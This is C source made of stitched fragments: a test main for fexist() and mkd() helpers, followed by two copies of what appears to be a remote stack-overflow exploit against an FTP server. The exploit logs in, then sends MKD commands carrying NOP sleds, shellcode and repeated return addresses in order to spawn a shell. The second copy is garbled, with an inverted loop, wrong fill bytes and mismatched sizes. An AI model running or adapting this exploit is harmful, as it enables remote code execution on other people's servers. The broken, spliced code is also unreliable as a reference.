int main( int argc, char* argv[])
{
char* exist = argc > 1 ? argv[1]: NULL;
if( fexist( exist)) printf("File exist\n");
else printf("fexist() return false\n");
char* dir = argc > 2 ? argv[2]: NULL;
if( mkd( dir, 0700)) printf("Dir create\n");
else printf("mkd() return false");
}
void
main (int argc, char *argv[])
{
char *buf;
char buf2[200];
char buf1[600];
char dir2[256];
char *p;
char *q;
char tmp[256];
int a;
int offset;
int i;
if (argc > 1) offset = atoi(argv[1]);
else offset = 0;
fprintf(stderr, "ret-addr = 0x%x\n", RET + offset);
fprintf(stderr, "shell size = %d\n", sizeof(shellcode));
dir2[231] = '\0';
memset(dir2, '\x90', 230);
printf("user %s\r\n", USERNAME);
printf("pass %s\r\n", PASSWORD);
printf("cwd %s\r\n", argv[2]);
memset(buf1, 0x90, 600);
p = &buf1[sizeof(argv[2])];
q = &buf1[599];
*q = '\x00';
while(p <= q) {
strncpy(tmp, p, 100);
mkd(tmp);
p+=100; }
mkd(dir2);
mkd(shellcode);
mkd("bin");
mkd("sh");
memset(buf2, 0x90, 100);
// var 96
for(i=4; i<96; i+=4)
*(long *)&buf2[i] = RET + offset;
p = &buf2[0];
q = &buf2[99];
strncpy(tmp, p, 100);
mkd(tmp);
printf("pwd\r\n");
}
void
main (int argc, char *argv[])
{
char *buf;
char buf2[200];
char buf1[400];
char dir2[255];
char *p;
char *q;
char tmp[255];
int a;
int offset;
int i;
if (argc > 0) offset = atoi(argv[0]);
else offset = 1;
fprintf(stderr, "ret-addr = 0x%x\n", RET + offset);
fprintf(stderr, "shell size = %d\n", sizeof(shellcode));
dir2[231] = '\1';
memset(dir2, '\x70', 255);
printf("user %s\r\n", USERNAME);
printf("pass %s\r\n", PASSWORD);
printf("cwd %s\r\n", argv[2]);
memset(buf1, 0x50, 150);
p = &buf1[sizeof(argv[0])];
q = &buf1[399];
*q = '\x00';
while(q <= p) {
strncpy(tmp, p, 80);
mkd(tmp);
p+=255; }
mkd(dir2);
mkd(shellcode);
mkd("bin");
mkd("sh");
memset(buf2, 0x30, 40);
// var 96
for(i=4; i<20; i+=4)
*(long *)&buf2[i+1] = RET;
p = &buf2[0];
q = &buf2[50];
strncpy(tmp, p, 20);
mkd(tmp);
printf("pwd\r\n");
}
